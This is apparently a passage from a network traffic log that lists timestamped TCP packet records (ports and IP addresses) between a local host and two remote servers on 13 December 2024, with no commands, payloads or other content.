Dec 13, 2024 16:43:38.985413074 CET	443	49810	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:38.988851070 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:38.988898993 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:38.988971949 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:38.989202023 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:38.989214897 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.036062956 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.036175013 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.057060003 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.057147980 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.059909105 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.059983015 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.063824892 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.063901901 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.065506935 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.065568924 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.068882942 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.068994045 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.072125912 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.072180033 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.074631929 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.074686050 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.077042103 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.077138901 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.078896999 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.078948975 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.081588984 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.081677914 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.085876942 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.085957050 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.088562012 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.088618040 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.091738939 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.091814995 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.094291925 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.094357014 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.096963882 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.097114086 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.126126051 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.126195908 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.230156898 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.230292082 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.252393007 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.252573013 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.255186081 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.255289078 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.257570028 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.257656097 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.260809898 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.260895014 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.263164997 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.263243914 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.265888929 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.265970945 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.269222975 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.269293070 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.271748066 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.271831989 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.274271011 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.274359941 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.277141094 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.277250051 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.279584885 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.279670954 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.280934095 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.281009912 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.284188032 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.284275055 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.286715031 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.286793947 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.317622900 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.317776918 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.421479940 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.421643019 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.442297935 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.442405939 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.444770098 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.444860935 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.450845003 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.450934887 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.451786041 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.451864958 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.454994917 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.455096006 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.457298040 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.457395077 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.460206032 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.460311890 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.463377953 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.463468075 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.466816902 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.466907024 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.469352007 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.469419003 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.474657059 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.474750996 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.477350950 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.477452040 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.479887009 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.479971886 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.483251095 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.483341932 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.491708994 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.504009962 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.512145042 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.512300014 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.616650105 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.616832018 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.637602091 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.637763023 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.640091896 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.640183926 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.642937899 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.643013000 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.645596981 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.645656109 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.648647070 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.648736954 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.651145935 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.651254892 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.653942108 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.654057026 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.656522989 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.656652927 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.659626961 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.659696102 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.662221909 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.662286043 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.665266991 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.665368080 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.667932034 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.667999029 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.670551062 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.670627117 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.673635960 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.673728943 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.676120043 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.676189899 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.704536915 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.704627037 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.807492018 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.807703018 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.828075886 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.828255892 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.831267118 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.831393003 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.833815098 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.833900928 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.836528063 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.836611032 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.839855909 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.839967966 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.842457056 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.842556000 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.844970942 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.845061064 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.847570896 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.847650051 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.850704908 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.850785017 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.852955103 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.853039026 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.856328011 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.856414080 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.858828068 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.858906984 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.861407995 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.861493111 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.864702940 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.864804029 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.893392086 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.893556118 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:39.997495890 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:39.997670889 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.019948959 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.020106077 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.022408962 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.022475958 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.024878025 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.024966955 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.028141975 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.028212070 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.030843019 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.030910969 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.033303976 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.033366919 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.036597967 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.036660910 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.039424896 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.039505005 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.041809082 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.041877985 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.044367075 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.044435978 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.048074961 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.048149109 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.049793959 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.049856901 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.053474903 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.053544998 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.056549072 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.056619883 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.058015108 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.070455074 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.085299969 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.085405111 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.189412117 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.189541101 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.212696075 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.212826967 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.214596987 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.214673042 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.217808008 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.217895031 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.221009970 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.221081018 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.222765923 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.222832918 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.226860046 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.226983070 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.228657007 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.228732109 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.231836081 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.231895924 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.234391928 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.234467030 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.236886978 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.236958027 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.239097118 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.239151955 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.242417097 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.242512941 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.245024920 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.245081902 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.245732069 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.245794058 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.245805979 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.245825052 CET	443	49799	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.245862961 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.290873051 CET	49799	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.426275969 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.426871061 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.426898003 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:40.427624941 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:40.427628994 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:41.013925076 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:41.014019012 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:41.014100075 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:41.015656948 CET	49816	443	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:41.015681982 CET	443	49816	185.147.125.51	192.168.2.3
Dec 13, 2024 16:43:42.355979919 CET	49796	80	192.168.2.3	185.147.125.51
Dec 13, 2024 16:43:50.049164057 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:50.049207926 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:50.051974058 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:50.057230949 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:50.057260036 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:51.288706064 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:51.288846970 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:51.290513992 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:51.290532112 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:51.290775061 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:51.346915007 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:51.348565102 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:51.348589897 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:51.348681927 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:52.014806032 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:52.014903069 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:52.014975071 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:52.016560078 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:52.016590118 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:52.016604900 CET	49840	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:52.016611099 CET	443	49840	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:52.062189102 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:52.062233925 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:52.062315941 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:52.062644958 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:52.062660933 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:53.280153036 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:53.280240059 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:53.281548977 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:53.281565905 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:53.281815052 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:53.283087969 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:53.283107042 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:53.283150911 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.005572081 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.005661964 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.005740881 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.005739927 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.005788088 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.005884886 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.005932093 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.005947113 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.006038904 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.006100893 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.006117105 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.006166935 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.012908936 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.021445990 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.021518946 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.021536112 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.065702915 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.065725088 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.112605095 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.125593901 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.175074100 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.201611042 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205163002 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205245018 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205274105 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.205344915 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205425978 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.205452919 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205514908 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205585957 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.205656052 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.205698013 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.205724955 CET	49846	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.205739975 CET	443	49846	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.300115108 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.300149918 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:54.300270081 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.300661087 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:54.300673962 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:55.545820951 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:55.546005011 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:55.885451078 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:55.885468006 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:55.886393070 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:55.887967110 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:55.888107061 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:55.888205051 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:57.112571001 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:57.112675905 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:57.112792969 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:57.114137888 CET	49852	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:57.114151955 CET	443	49852	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:57.297333002 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:57.297373056 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:57.297487974 CET	49859	443	192.168.2.3	172.67.207.38
